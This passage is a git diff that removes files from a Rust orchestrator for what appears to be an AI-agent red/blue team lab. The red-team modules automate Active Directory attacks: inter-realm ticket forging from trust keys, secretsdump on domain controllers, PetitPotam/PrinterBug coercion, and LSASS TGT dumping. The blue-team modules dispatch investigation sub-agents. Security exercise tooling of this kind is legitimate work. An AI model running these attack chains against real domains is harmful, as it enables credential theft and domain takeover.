never fall back - // to bare NetBIOS name which produces invalid domain strings. - let target_domain = trust.domain.clone(); - - let target_dc_ip = state - .domain_controllers - .get(&target_domain.to_lowercase()) - .cloned(); - - let source_domain_sid = state - .domain_sids - .get(&source_domain.to_lowercase()) - .cloned(); - let target_domain_sid = state - .domain_sids - .get(&target_domain.to_lowercase()) - .cloned(); - - let source_dc_ip = state - .domain_controllers - .get(&source_domain.to_lowercase()) - .cloned(); - - Some(TrustFollowWork { - dedup_key, - hash: hash.clone(), - source_domain, - target_domain, - target_dc_ip, - source_domain_sid, - target_domain_sid, - source_dc_ip, - }) - }) - .collect(); - - (items, admin_cred) - }; - - for item in work { - let vuln_id = format!( - "forest_trust_{}_{}", - item.source_domain.to_lowercase(), - item.target_domain.to_lowercase() - ); - let trust_target = item - .target_dc_ip - .clone() - .unwrap_or_else(|| item.target_domain.clone()); - { - let mut details = std::collections::HashMap::new(); - details.insert( - "source_domain".into(), - serde_json::Value::String(item.source_domain.clone()), - ); - details.insert( - "target_domain".into(), - serde_json::Value::String(item.target_domain.clone()), - ); - details.insert( - "trust_account".into(), - serde_json::Value::String(item.hash.username.clone()), - ); - details.insert( - "note".into(), - serde_json::Value::String(format!( - "Forest trust escalation via {} trust key — inter-realm ticket + secretsdump", - item.hash.username - )), - ); - let vuln = ares_core::models::VulnerabilityInfo { - vuln_id: vuln_id.clone(), - vuln_type: "forest_trust_escalation".to_string(), - target: trust_target, - discovered_by: "trust_automation".to_string(), - discovered_at: chrono::Utc::now(), - details, - recommended_agent: String::new(), - priority: 1, - }; - let _ = dispatcher - .state - .publish_vulnerability(&dispatcher.queue, vuln) - .await; - } - - // 1. Dispatch inter-realm ticket creation. - // Use field names that match the tool and prompt expectations: - // - `vuln_type` routes to generate_trust_key_prompt - // - `source_sid`/`target_sid` match create_inter_realm_ticket tool - // - `trusted_domain` is read by the trust prompt - // - Include admin creds + dc_ip so the LLM can call get_sid if SIDs are missing - let mut ticket_payload = json!({ - "technique": "create_inter_realm_ticket", - "vuln_type": "cross_forest", - "domain": item.source_domain, - "trusted_domain": item.target_domain, - "target_domain": item.target_domain, - "target": item.target_dc_ip.as_deref().unwrap_or(&item.target_domain), - "trust_key": item.hash.hash_value, - "trust_account": item.hash.username, - "vuln_id": &vuln_id, - }); - if let Some(ref sid) = item.source_domain_sid { - ticket_payload["source_sid"] = json!(sid); - } - if let Some(ref sid) = item.target_domain_sid { - ticket_payload["target_sid"] = json!(sid); - } - if let Some(ref aes) = item.hash.aes_key { - ticket_payload["aes_key"] = json!(aes); - } - if let Some(ref dc_ip) = item.source_dc_ip { - ticket_payload["dc_ip"] = json!(dc_ip); - } - if let Some(ref cred) = admin_cred_phase3 { - ticket_payload["username"] = json!(cred.username); - ticket_payload["password"] = json!(cred.password); - } - - match dispatcher - .throttled_submit("exploit", "privesc", ticket_payload, 1) - .await - { - Ok(Some(task_id)) => { - info!( - task_id = %task_id, - trust_account = %item.hash.username, - source_domain = %item.source_domain, - target_domain = %item.target_domain, - has_source_sid = item.source_domain_sid.is_some(), - has_target_sid = item.target_domain_sid.is_some(), - "Inter-realm ticket task dispatched" - ); - let _ = dispatcher - .state - .mark_exploited(&dispatcher.queue, &vuln_id) - .await; - } - Ok(None) => { - debug!("Inter-realm ticket deferred by throttler"); - continue; - } - Err(e) => { - warn!(err = %e, "Failed to dispatch inter-realm ticket"); - continue; - } - } - - // 2. If we know the target DC, dispatch secretsdump against it - if let Some(ref dc_ip) = item.target_dc_ip { - let sd_payload = json!({ - "technique": "secretsdump", - "target_ip": dc_ip, - "domain": item.target_domain, - "trust_account": item.hash.username, - "trust_key": item.hash.hash_value, - }); - - match dispatcher - .throttled_submit("credential_access", "credential_access", sd_payload, 2) - .await - { - Ok(Some(task_id)) => { - info!( - task_id = %task_id, - target_dc = %dc_ip, - target_domain = %item.target_domain, - "Cross-domain secretsdump dispatched" - ); - } - Ok(None) => {} - Err(e) => warn!(err = %e, "Failed to dispatch cross-domain secretsdump"), - } - } - - // Mark as processed - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_TRUST_FOLLOW, item.dedup_key.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &item.dedup_key) - .await; - } - } -} - -struct TrustFollowWork { - dedup_key: String, - hash: ares_core::models::Hash, - source_domain: String, - target_domain: String, - target_dc_ip: Option, - source_domain_sid: Option, - target_domain_sid: Option, - source_dc_ip: Option, -} diff --git a/ares-orchestrator/src/automation/unconstrained.rs b/ares-orchestrator/src/automation/unconstrained.rs deleted file mode 100644 index 162009f0..00000000 --- a/ares-orchestrator/src/automation/unconstrained.rs +++ /dev/null @@ -1,385 +0,0 @@ -//! auto_unconstrained_exploitation -- coerce-and-dump for unconstrained delegation. -//! -//! When a machine account with unconstrained delegation is discovered (e.g. -//! `DC02$`), this automation orchestrates the full attack chain: -//! -//! 1. **Coerce** a DC to authenticate to the unconstrained delegation host -//! (PetitPotam / PrinterBug). The DC's TGT is cached in LSASS on that host. -//! 2. **Dump** cached TGTs from the host's LSASS memory via lsassy. -//! 3. **Chain** — result_processing's `auto_chain_s4u_secretsdump` picks up any -//! `.ccache` ticket and dispatches secretsdump automatically. -//! -//! User accounts with unconstrained delegation (e.g. `sarah.connor`) are left to -//! the LLM-driven exploit path since we can't determine the target host. - -use std::collections::HashMap; -use std::sync::Arc; -use std::time::Duration; - -use serde_json::json; -use tokio::sync::watch; -use tokio::time::Instant; -use tracing::{debug, info, warn}; - -use crate::dispatcher::Dispatcher; -use crate::state::DEDUP_COERCED_DCS; - -/// Delay after coercion before dispatching the first TGT dump, giving the -/// coerced authentication time to complete and the TGT to land in LSASS. -const COERCE_TO_DUMP_DELAY: Duration = Duration::from_secs(15); - -/// Maximum TGT dump attempts per vulnerability before giving up. -const MAX_DUMP_ATTEMPTS: u32 = 3; - -/// Delay between successive dump retries for the same vuln. -const DUMP_RETRY_DELAY: Duration = Duration::from_secs(60); - -// ----------------------------------------------------------------------- -// Phase tracking (in-memory only — intentionally not persisted so restarts -// re-trigger the chain, since cached TGTs expire quickly). -// ----------------------------------------------------------------------- - -#[derive(Debug)] -struct PhaseState { - coercion_dispatched_at: Option, - dump_attempts: u32, - last_dump_at: Option, - completed: bool, -} - -/// Monitors for unconstrained delegation vulns and orchestrates coerce → dump. -/// Interval: 20s. Wakes on delegation_notify and credential_access_notify. -pub async fn auto_unconstrained_exploitation( - dispatcher: Arc, - mut shutdown: watch::Receiver, -) { - let deleg_notify = dispatcher.delegation_notify.clone(); - let cred_notify = dispatcher.credential_access_notify.clone(); - let mut interval = tokio::time::interval(Duration::from_secs(20)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - let mut phases: HashMap = HashMap::new(); - - loop { - tokio::select! { - _ = interval.tick() => {}, - _ = deleg_notify.notified() => {}, - _ = cred_notify.notified() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - let work: Vec = { - let state = dispatcher.state.read().await; - - if state.has_domain_admin { - continue; - } - - state - .discovered_vulnerabilities - .values() - .filter_map(|vuln| { - if vuln.vuln_type.to_lowercase() != "unconstrained_delegation" { - return None; - } - if state.exploited_vulnerabilities.contains(&vuln.vuln_id) { - return None; - } - - let account_name = vuln - .details - .get("account_name") - .and_then(|v| v.as_str())? - .to_string(); - - let domain = vuln - .details - .get("domain") - .and_then(|v| v.as_str()) - .unwrap_or("") - .to_string(); - - // Skip completed vulns - if phases.get(&vuln.vuln_id).is_some_and(|p| p.completed) { - return None; - } - - // Only automate machine accounts — we can resolve hostname → IP. - // User accounts (sarah.connor) go through the LLM exploit path. - if !account_name.ends_with('$') { - return None; - } - - // Resolve machine hostname → IP from discovered hosts. - // DC02$ → look for host with hostname starting with "dc02". - let hostname_prefix = account_name.trim_end_matches('$').to_lowercase(); - let host_ip = state.hosts.iter().find_map(|h| { - let h_lower = h.hostname.to_lowercase(); - if h_lower == hostname_prefix - || h_lower.starts_with(&format!("{hostname_prefix}.")) - { - Some(h.ip.clone()) - } else { - None - } - })?; - - // Find a DC in the same domain — this is what we coerce FROM. - let dc_ip = state - .domain_controllers - .get(&domain.to_lowercase()) - .cloned(); - - // Find any non-quarantined credential for this domain. - let credential = state - .credentials - .iter() - .find(|c| { - c.domain.to_lowercase() == domain.to_lowercase() - && !state.is_credential_quarantined(&c.username, &c.domain) - }) - .cloned(); - - if credential.is_none() { - debug!( - vuln_id = %vuln.vuln_id, - "Unconstrained: no credential available yet" - ); - return None; - } - - // Determine action based on current phase. - let phase = phases.get(&vuln.vuln_id); - - // If auto_coercion already coerced this DC, skip straight to dump. - let already_coerced = dc_ip - .as_ref() - .is_some_and(|ip| state.is_processed(DEDUP_COERCED_DCS, ip)); - - let action = match phase { - // No phase yet — dispatch coercion (or skip if already coerced). - None if already_coerced => Action::Dump, - None if dc_ip.is_some() => Action::Coerce, - None => { - debug!( - vuln_id = %vuln.vuln_id, - "Unconstrained: no DC found for coercion" - ); - return None; - } - - // Coercion dispatched, waiting for delay before dump. - Some(p) - if p.coercion_dispatched_at.is_some() - && p.dump_attempts == 0 - && p.coercion_dispatched_at.unwrap().elapsed() - >= COERCE_TO_DUMP_DELAY => - { - Action::Dump - } - - // Dump retry — previous attempt didn't yield TGTs. - Some(p) - if p.dump_attempts > 0 - && p.dump_attempts < MAX_DUMP_ATTEMPTS - && p.last_dump_at - .is_none_or(|t| t.elapsed() >= DUMP_RETRY_DELAY) => - { - Action::Dump - } - - _ => return None, - }; - - Some(UnconstrainedWork { - vuln_id: vuln.vuln_id.clone(), - account_name, - domain, - host_ip, - dc_ip, - credential, - action, - }) - }) - .collect() - }; - - for item in work { - match item.action { - Action::Coerce => { - let dc_ip = match &item.dc_ip { - Some(ip) => ip.clone(), - None => continue, - }; - - let cred = match &item.credential { - Some(c) => c, - None => continue, - }; - - // Coerce DC → unconstrained host. The DC's TGT is cached - // in the unconstrained host's LSASS. - let payload = json!({ - "target_ip": dc_ip, - "listener_ip": item.host_ip, - "techniques": ["petitpotam", "printerbug"], - "credential": { - "username": cred.username, - "password": cred.password, - "domain": cred.domain, - }, - "reason": "unconstrained_delegation_coercion", - }); - - match dispatcher - .throttled_submit("coercion", "coercion", payload, 8) - .await - { - Ok(Some(task_id)) => { - info!( - task_id = %task_id, - vuln_id = %item.vuln_id, - account = %item.account_name, - dc = %dc_ip, - listener = %item.host_ip, - "Unconstrained delegation: coercion dispatched (DC → host)" - ); - phases.insert( - item.vuln_id.clone(), - PhaseState { - coercion_dispatched_at: Some(Instant::now()), - dump_attempts: 0, - last_dump_at: None, - completed: false, - }, - ); - } - Ok(None) => { - debug!(vuln_id = %item.vuln_id, "Coercion deferred by throttler"); - } - Err(e) => { - warn!( - err = %e, - vuln_id = %item.vuln_id, - "Failed to dispatch unconstrained coercion" - ); - } - } - } - - Action::Dump => { - let cred = match &item.credential { - Some(c) => c, - None => continue, - }; - - let payload = json!({ - "technique": "unconstrained_tgt_dump", - "vuln_type": "unconstrained_delegation", - "vuln_id": item.vuln_id, - "target": item.host_ip, - "target_ip": item.host_ip, - "domain": item.domain, - "account_name": item.account_name, - "credential": { - "username": cred.username, - "password": cred.password, - "domain": cred.domain, - }, - }); - - match dispatcher - .throttled_submit("exploit", "privesc", payload, 9) - .await - { - Ok(Some(task_id)) => { - let phase = phases.entry(item.vuln_id.clone()).or_insert(PhaseState { - coercion_dispatched_at: None, - dump_attempts: 0, - last_dump_at: None, - completed: false, - }); - phase.dump_attempts += 1; - phase.last_dump_at = Some(Instant::now()); - - info!( - task_id = %task_id, - vuln_id = %item.vuln_id, - attempt = phase.dump_attempts, - target = %item.host_ip, - "Unconstrained delegation: TGT dump dispatched" - ); - - if phase.dump_attempts >= MAX_DUMP_ATTEMPTS { - phase.completed = true; - debug!( - vuln_id = %item.vuln_id, - "Unconstrained delegation: max dump attempts reached" - ); - } - } - Ok(None) => { - debug!(vuln_id = %item.vuln_id, "TGT dump deferred by throttler"); - } - Err(e) => { - warn!( - err = %e, - vuln_id = %item.vuln_id, - "Failed to dispatch TGT dump" - ); - } - } - } - } - } - } -} - -#[derive(Debug)] -enum Action { - Coerce, - Dump, -} - -struct UnconstrainedWork { - vuln_id: String, - account_name: String, - domain: String, - host_ip: String, - dc_ip: Option, - credential: Option, - action: Action, -} - -#[cfg(test)] -mod tests { - #[test] - fn test_hostname_resolution_machine_account() { - // DC02$ → "dc02" - let account = "DC02$"; - let prefix = account.trim_end_matches('$').to_lowercase(); - assert_eq!(prefix, "dc02"); - - // Should match "dc02.child.contoso.local" - let hostname = "dc02.child.contoso.local"; - let h_lower = hostname.to_lowercase(); - assert!(h_lower == prefix || h_lower.starts_with(&format!("{prefix}."))); - } - - #[test] - fn test_hostname_resolution_short_name() { - let account = "DC01$"; - let prefix = account.trim_end_matches('$').to_lowercase(); - assert_eq!(prefix, "dc01"); - - // Should match "dc01" - assert!("dc01" == prefix); - // Should match "dc01.contoso.local" - assert!("dc01.contoso.local".starts_with(&format!("{prefix}."))); - // Should NOT match "dc011.contoso.local" - assert!(!"dc011.contoso.local".starts_with(&format!("{prefix}."))); - } -} diff --git a/ares-orchestrator/src/automation_spawner.rs b/ares-orchestrator/src/automation_spawner.rs deleted file mode 100644 index e524bc4e..00000000 --- a/ares-orchestrator/src/automation_spawner.rs +++ /dev/null @@ -1,47 +0,0 @@ -use std::sync::Arc; - -use tokio::sync::watch; -use tracing::info; - -use crate::automation; -use crate::dispatcher::Dispatcher; - -/// Spawn all automation background tasks. Returns their JoinHandles. -pub(crate) fn spawn_automation_tasks( - dispatcher: Arc, - shutdown_rx: watch::Receiver, -) -> Vec> { - let mut handles = Vec::new(); - - macro_rules! spawn_auto { - ($name:ident) => {{ - let d = dispatcher.clone(); - let s = shutdown_rx.clone(); - handles.push(tokio::spawn(async move { - automation::$name(d, s).await; - })); - }}; - } - - spawn_auto!(auto_crack_dispatch); - spawn_auto!(auto_mssql_detection); - spawn_auto!(auto_adcs_enumeration); - spawn_auto!(auto_share_enumeration); - spawn_auto!(auto_share_spider); - spawn_auto!(auto_bloodhound); - spawn_auto!(auto_delegation_enumeration); - spawn_auto!(auto_coercion); - spawn_auto!(auto_local_admin_secretsdump); - spawn_auto!(auto_credential_access); - spawn_auto!(auto_credential_expansion); - spawn_auto!(auto_golden_ticket); - spawn_auto!(auto_acl_chain_follow); - spawn_auto!(auto_trust_follow); - spawn_auto!(auto_s4u_exploitation); - spawn_auto!(auto_gmsa_extraction); - spawn_auto!(auto_unconstrained_exploitation); - spawn_auto!(auto_stall_detection); - - info!(count = handles.len(), "Automation tasks spawned"); - handles -} diff --git a/ares-orchestrator/src/blue/auto_submit.rs b/ares-orchestrator/src/blue/auto_submit.rs deleted file mode 100644 index 524106df..00000000 --- a/ares-orchestrator/src/blue/auto_submit.rs +++ /dev/null @@ -1,246 +0,0 @@ -//! Auto-submit blue team investigations from red team operation state. -//! -//! When `ARES_BLUE_ENABLED=1`, this background task watches for red team -//! findings and automatically submits investigation requests to the -//! `ares:blue:investigations` queue. Without this, the blue orchestrator -//! polls an empty queue forever — investigation requests must be pushed -//! explicitly (via CLI) or auto-submitted (this module). - -use std::sync::Arc; -use std::time::Duration; - -use anyhow::Result; -use chrono::Utc; -use redis::AsyncCommands; -use tokio::sync::watch; -use tracing::{info, warn}; - -use crate::config::OrchestratorConfig; -use crate::state::SharedState; -use crate::task_queue::TaskQueue; - -/// Minimum red team activity before submitting a blue investigation. -const MIN_CREDENTIALS: usize = 1; -const MIN_HOSTS: usize = 2; - -/// How long to wait after orchestrator start before first check. -const INITIAL_DELAY_SECS: u64 = 90; - -/// How often to check if a new investigation should be submitted. -const CHECK_INTERVAL_SECS: u64 = 30; - -/// Collect env vars that blue tools need (Grafana, Loki, etc.). -fn collect_blue_env_vars() -> std::collections::HashMap { - const NAMES: &[&str] = &[ - "OPENAI_API_KEY", - "ANTHROPIC_API_KEY", - "GRAFANA_SERVICE_ACCOUNT_TOKEN", - "GRAFANA_URL", - "LOKI_URL", - "LOKI_AUTH_TOKEN", - "PROMETHEUS_URL", - ]; - let mut map = std::collections::HashMap::new(); - for name in NAMES { - if let Ok(val) = std::env::var(name) { - if !val.is_empty() { - map.insert(name.to_string(), val); - } - } - } - map -} - -/// Spawn the blue auto-submit task as a background tokio task. -pub fn spawn_blue_auto_submit( - queue: TaskQueue, - shared_state: SharedState, - config: Arc, - model_spec: String, - shutdown_rx: watch::Receiver, -) -> tokio::task::JoinHandle<()> { - tokio::spawn(async move { - if let Err(e) = auto_submit_loop(queue, shared_state, config, model_spec, shutdown_rx).await - { - warn!("Blue auto-submit exited with error: {e}"); - } - }) -} - -async fn auto_submit_loop( - queue: TaskQueue, - shared_state: SharedState, - config: Arc, - model_spec: String, - mut shutdown_rx: watch::Receiver, -) -> Result<()> { - info!("Blue auto-submit: waiting {INITIAL_DELAY_SECS}s for red team activity"); - - // Wait for initial red team activity - tokio::select! { - _ = tokio::time::sleep(Duration::from_secs(INITIAL_DELAY_SECS)) => {} - _ = shutdown_rx.changed() => return Ok(()), - } - - let mut submitted = false; - - loop { - if *shutdown_rx.borrow() { - break; - } - - if !submitted { - let state = shared_state.read().await; - let cred_count = state.credentials.len(); - let host_count = state.hosts.len(); - let vuln_count = state.discovered_vulnerabilities.len(); - let has_enough = cred_count >= MIN_CREDENTIALS || host_count >= MIN_HOSTS; - drop(state); - - if has_enough { - info!( - credentials = cred_count, - hosts = host_count, - vulns = vuln_count, - "Blue auto-submit: red team has enough findings, submitting investigation" - ); - - match submit_investigation(&queue, &shared_state, &config, &model_spec).await { - Ok(inv_id) => { - info!( - investigation_id = %inv_id, - operation_id = %config.operation_id, - "Blue auto-submit: investigation queued" - ); - submitted = true; - } - Err(e) => { - warn!("Blue auto-submit: failed to submit investigation: {e}"); - } - } - } - } - - if submitted { - // Done — exit the loop - break; - } - - tokio::select! { - _ = tokio::time::sleep(Duration::from_secs(CHECK_INTERVAL_SECS)) => {} - _ = shutdown_rx.changed() => break, - } - } - - info!("Blue auto-submit task finished"); - Ok(()) -} - -/// Build and submit a blue investigation request from the current red team state. -async fn submit_investigation( - queue: &TaskQueue, - shared_state: &SharedState, - config: &OrchestratorConfig, - model_spec: &str, -) -> Result { - let state = shared_state.read().await; - let now = Utc::now(); - - let op_id = &config.operation_id; - let inv_id = format!("inv-{}", now.format("%Y%m%d-%H%M%S")); - - // Collect target data from state - let target_ips: Vec = state.hosts.iter().map(|h| h.ip.clone()).collect(); - let target_users: Vec = state - .credentials - .iter() - .map(|c| c.username.clone()) - .collect(); - let cred_count = state.credentials.len(); - let host_count = state.hosts.len(); - let vuln_count = state.discovered_vulnerabilities.len(); - let domains: Vec = state.domains.clone(); - - // Collect MITRE techniques from timeline if available - let techniques: Vec = Vec::new(); // Timeline techniques would need Redis lookup - - drop(state); - - let grafana_url = std::env::var("GRAFANA_URL").ok(); - let grafana_token = std::env::var("GRAFANA_SERVICE_ACCOUNT_TOKEN").ok(); - - // Build synthetic alert (mirrors ares-cli blue from-operation) - let operation_context = serde_json::json!({ - "operation_id": op_id, - "attack_window_start": now.to_rfc3339(), - "attack_window_end": now.to_rfc3339(), - "techniques_used": techniques, - "domains": domains, - }); - - let alert = serde_json::json!({ - "labels": { - "alertname": format!("RedTeamOperation_{op_id}"), - "severity": "critical", - "source": "ares-red-team", - }, - "annotations": { - "summary": format!( - "Red team operation {op_id} - {cred_count} credentials, {host_count} hosts, {vuln_count} vulnerabilities", - ), - "description": format!( - "Investigate blue team detection coverage for red team operation {op_id}. \ - Operation is in progress.", - ), - }, - "operation_context": operation_context, - "startsAt": now.to_rfc3339(), - "target_ips": &target_ips[..std::cmp::min(target_ips.len(), 50)], - "target_users": &target_users[..std::cmp::min(target_users.len(), 50)], - }); - - // Strip provider prefix for the model name (blue runner does this too) - let model = model_spec - .split_once('/') - .map(|(_, name)| name) - .unwrap_or(model_spec); - - let request = serde_json::json!({ - "investigation_id": inv_id, - "alert": alert, - "correlation_context": null, - "model": model, - "max_steps": 75, - "multi_agent": true, - "auto_route": false, - "report_dir": null, - "operation_id": op_id, - "grafana_url": grafana_url, - "grafana_api_key": grafana_token, - "submitted_at": now.to_rfc3339(), - }); - - let mut conn = queue.connection(); - - // Store env vars for the investigation (blue tools read these from Redis) - let env_vars = collect_blue_env_vars(); - if !env_vars.is_empty() { - let env_key = format!("ares:blue:inv:{inv_id}:env_vars"); - let env_json = serde_json::to_string(&env_vars)?; - let _: () = conn.set(&env_key, &env_json).await?; - let _: () = conn.expire(&env_key, 3600).await?; - } - - // Push to investigation queue - let request_json = serde_json::to_string(&request)?; - let _: () = conn - .rpush("ares:blue:investigations", &request_json) - .await?; - - // Track investigation against operation - let op_inv_key = format!("ares:blue:op:{op_id}:investigations"); - let _: () = conn.sadd(&op_inv_key, &inv_id).await?; - let _: () = conn.expire(&op_inv_key, 7 * 24 * 3600).await?; - - Ok(inv_id) -} diff --git a/ares-orchestrator/src/blue/callbacks.rs b/ares-orchestrator/src/blue/callbacks.rs deleted file mode 100644 index 5020ae3a..00000000 --- a/ares-orchestrator/src/blue/callbacks.rs +++ /dev/null @@ -1,621 +0,0 @@ -//! Blue team callback handler for orchestrator dispatch and query tools. -//! -//! Implements `CallbackHandler` to handle: -//! - **Dispatch tools** — `dispatch_triage`, `dispatch_threat_hunt`, -//! `dispatch_lateral_analysis` run sub-agent loops inline and return results. -//! - **Query tools** — `get_investigation_status`, `get_task_result`, -//! `wait_for_all_tasks` read from Redis investigation state. -//! - **Completion callbacks** — `complete_investigation`, `escalate_investigation`, -//! `triage_complete`, etc. signal investigation lifecycle transitions. - -use std::sync::Arc; - -use anyhow::Result; -use tracing::{info, warn}; - -use ares_llm::agent_loop::CallbackResult; -use ares_llm::tool_registry::blue::{self, BlueAgentRole}; -use ares_llm::{ - run_agent_loop, AgentLoopConfig, CallbackHandler, LlmProvider, TokenUsage, ToolCall, - ToolDispatcher, -}; - -use super::sub_agent::{BlueToolDispatcher, SubAgentCallbackHandler}; - -/// All tool names this handler recognizes as callbacks. -pub(super) const BLUE_HANDLED_TOOLS: &[&str] = &[ - // Dispatch tools (run sub-agent loops) - "dispatch_triage", - "dispatch_threat_hunt", - "dispatch_lateral_analysis", - // Query tools - "get_investigation_status", - "get_task_result", - "wait_for_all_tasks", - // Completion/lifecycle callbacks - "triage_complete", - "hunt_complete", - "lateral_complete", - "complete_investigation", - "escalate_investigation", - "confirm_escalation", - "downgrade_escalation", - "request_reinvestigation", - "route_to_team", -]; - -/// Blue team callback handler for the orchestrator agent. -/// -/// Created per-investigation, holds references needed to run sub-agent loops -/// and query investigation state. -pub struct BlueCallbackHandler { - provider: Arc, - dispatcher: Arc, - model: String, - investigation_id: String, - alert: serde_json::Value, - redis_url: String, -} - -impl BlueCallbackHandler { - pub fn new( - provider: Arc, - dispatcher: Arc, - model: String, - investigation_id: String, - alert: serde_json::Value, - redis_url: String, - ) -> Self { - Self { - provider, - dispatcher, - model, - investigation_id, - alert, - redis_url, - } - } - - /// Run a sub-agent loop for a blue team role and return the result text. - async fn run_sub_agent(&self, role: BlueAgentRole, task_prompt: &str) -> Result { - let tools = blue::blue_tools_for_role(role); - let capabilities: Vec = tools - .iter() - .filter(|t| !blue::is_blue_callback_tool(&t.name)) - .map(|t| t.name.clone()) - .collect(); - - let system_prompt = - ares_llm::prompt::blue::build_blue_system_prompt(role.as_str(), &capabilities)?; - - let config = AgentLoopConfig { - model: self.model.clone(), - max_steps: 50, - max_tool_calls_per_name: 25, - ..AgentLoopConfig::default() - }; - - // Wrap the dispatcher so blue tools (add_evidence, add_technique, etc.) - // are executed locally via dispatch_blue() instead of going through - // the red-team dispatcher which doesn't know about them. - let blue_dispatcher: Arc = Arc::new(BlueToolDispatcher { - inner: Arc::clone(&self.dispatcher), - }); - - let sub_agent_cb: Arc = Arc::new(SubAgentCallbackHandler { - investigation_id: self.investigation_id.clone(), - redis_url: self.redis_url.clone(), - }); - - let outcome = run_agent_loop( - self.provider.as_ref(), - blue_dispatcher, - &config, - &system_prompt, - task_prompt, - role.as_str(), - &self.investigation_id, - &tools, - Some(sub_agent_cb), - ) - .await; - - // Extract result text from the outcome - let result = match &outcome.reason { - ares_llm::LoopEndReason::TaskComplete { result, .. } => result.clone(), - ares_llm::LoopEndReason::EndTurn { content } => content.clone(), - ares_llm::LoopEndReason::RequestAssistance { issue, context } => { - format!("Sub-agent requested assistance: {issue}. Context: {context}") - } - ares_llm::LoopEndReason::MaxSteps => { - format!("Sub-agent hit max steps ({} steps)", outcome.steps) - } - ares_llm::LoopEndReason::MaxTokens => "Sub-agent hit max tokens".to_string(), - ares_llm::LoopEndReason::Error(e) => format!("Sub-agent error: {e}"), - }; - - Ok(result) - } - - /// Dispatch triage sub-agent. - async fn dispatch_triage(&self, _call: &ToolCall) -> Result { - info!( - investigation_id = %self.investigation_id, - "Dispatching triage sub-agent" - ); - - let alert_summary = serde_json::to_string_pretty(&self.alert).unwrap_or_default(); - let task_prompt = format!( - "You are triaging alert for investigation {}.\n\n\ - Alert data:\n{}\n\n\ - Analyze this alert. Determine severity, identify key indicators of compromise, \ - and recommend whether this needs deeper investigation. Use the available Loki \ - query tools to examine relevant logs around the alert timeframe.", - self.investigation_id, alert_summary - ); - - let result = self - .run_sub_agent(BlueAgentRole::Triage, &task_prompt) - .await?; - info!( - investigation_id = %self.investigation_id, - "Triage sub-agent completed" - ); - Ok(CallbackResult::Continue(format!( - "Triage result:\n{result}" - ))) - } - - /// Dispatch threat hunt sub-agent. - async fn dispatch_threat_hunt(&self, call: &ToolCall) -> Result { - let technique_id = call.arguments["technique_id"].as_str().unwrap_or("unknown"); - let detection_method = call.arguments["detection_method"] - .as_str() - .unwrap_or("log_analysis"); - let hostname = call.arguments["hostname"].as_str().unwrap_or(""); - let username = call.arguments["username"].as_str().unwrap_or(""); - let context = call.arguments["context"].as_str().unwrap_or(""); - - info!( - investigation_id = %self.investigation_id, - technique_id = technique_id, - "Dispatching threat hunt sub-agent" - ); - - let mut task_prompt = format!( - "You are hunting for MITRE ATT&CK technique {} in investigation {}.\n\ - Detection method: {}\n", - technique_id, self.investigation_id, detection_method - ); - if !hostname.is_empty() { - task_prompt.push_str(&format!("Target host: {hostname}\n")); - } - if !username.is_empty() { - task_prompt.push_str(&format!("Target user: {username}\n")); - } - if !context.is_empty() { - task_prompt.push_str(&format!("Context: {context}\n")); - } - task_prompt.push_str( - "\nUse the available Loki query tools to search for evidence of this technique. \ - Look for relevant log patterns, authentication events, process execution, \ - and lateral movement indicators.", - ); - - let result = self - .run_sub_agent(BlueAgentRole::ThreatHunter, &task_prompt) - .await?; - info!( - investigation_id = %self.investigation_id, - technique_id = technique_id, - "Threat hunt sub-agent completed" - ); - Ok(CallbackResult::Continue(format!( - "Threat hunt result ({technique_id}):\n{result}" - ))) - } - - /// Dispatch lateral analysis sub-agent. - async fn dispatch_lateral_analysis(&self, call: &ToolCall) -> Result { - let focus_host = call.arguments["focus_host"].as_str().unwrap_or("unknown"); - let focus_user = call.arguments["focus_user"].as_str().unwrap_or(""); - let context = call.arguments["context"].as_str().unwrap_or(""); - - info!( - investigation_id = %self.investigation_id, - focus_host = focus_host, - "Dispatching lateral analysis sub-agent" - ); - - let mut task_prompt = format!( - "You are analyzing lateral movement patterns in investigation {}.\n\ - Primary host: {}\n", - self.investigation_id, focus_host - ); - if !focus_user.is_empty() { - task_prompt.push_str(&format!("Primary user: {focus_user}\n")); - } - if !context.is_empty() { - task_prompt.push_str(&format!("Context: {context}\n")); - } - task_prompt.push_str( - "\nUse the available Loki query tools to trace authentication patterns, \ - SMB/WinRM/RDP connections, and credential usage across hosts. Map the \ - lateral movement path and identify compromised accounts.", - ); - - let result = self - .run_sub_agent(BlueAgentRole::LateralAnalyst, &task_prompt) - .await?; - info!( - investigation_id = %self.investigation_id, - focus_host = focus_host, - "Lateral analysis sub-agent completed" - ); - Ok(CallbackResult::Continue(format!( - "Lateral analysis result:\n{result}" - ))) - } - - /// Dispatch escalation triage sub-agent. - /// - /// Instead of immediately returning `RequestAssistance`, we launch an - /// `EscalationTriage` sub-agent that reviews the investigation context and - /// decides whether to confirm, downgrade, reinvestigate, or route. - async fn dispatch_escalation_triage(&self, call: &ToolCall) -> Result { - let reason = call.arguments["reason"].as_str().unwrap_or("unknown"); - let severity = call.arguments["severity"].as_str().unwrap_or("high"); - - info!( - investigation_id = %self.investigation_id, - severity = severity, - reason = reason, - "Dispatching escalation triage sub-agent" - ); - - let task_prompt = format!( - "You are performing escalation triage for investigation {}.\n\n\ - Escalation reason: {}\n\ - Severity: {}\n\n\ - Review the full investigation context using get_investigation_context. \ - Then make ONE of these decisions:\n\ - 1. confirm_escalation — if the evidence warrants human review\n\ - 2. downgrade_escalation — if this is a false positive or low severity\n\ - 3. request_reinvestigation — if more evidence is needed before deciding\n\ - 4. route_to_team — if a specialist team should handle this\n\n\ - Be decisive. Evaluate the evidence quality, technique severity, and \ - scope of compromise before making your decision.", - self.investigation_id, reason, severity - ); - - let result = self - .run_sub_agent(BlueAgentRole::EscalationTriage, &task_prompt) - .await?; - - info!( - investigation_id = %self.investigation_id, - "Escalation triage sub-agent completed" - ); - - // If the triage confirmed escalation, propagate as RequestAssistance - // so the orchestrator loop terminates with escalated status. - // Otherwise return the triage decision as a Continue so the orchestrator - // can incorporate the finding (e.g., downgrade → complete investigation). - let lower = result.to_lowercase(); - if lower.contains("escalation confirmed") || lower.contains("confirm") { - Ok(CallbackResult::RequestAssistance { - issue: format!("Escalation confirmed by triage ({severity}): {reason}"), - context: result, - }) - } else { - Ok(CallbackResult::Continue(format!( - "Escalation triage result:\n{result}" - ))) - } - } - - /// Handle query tools that read investigation 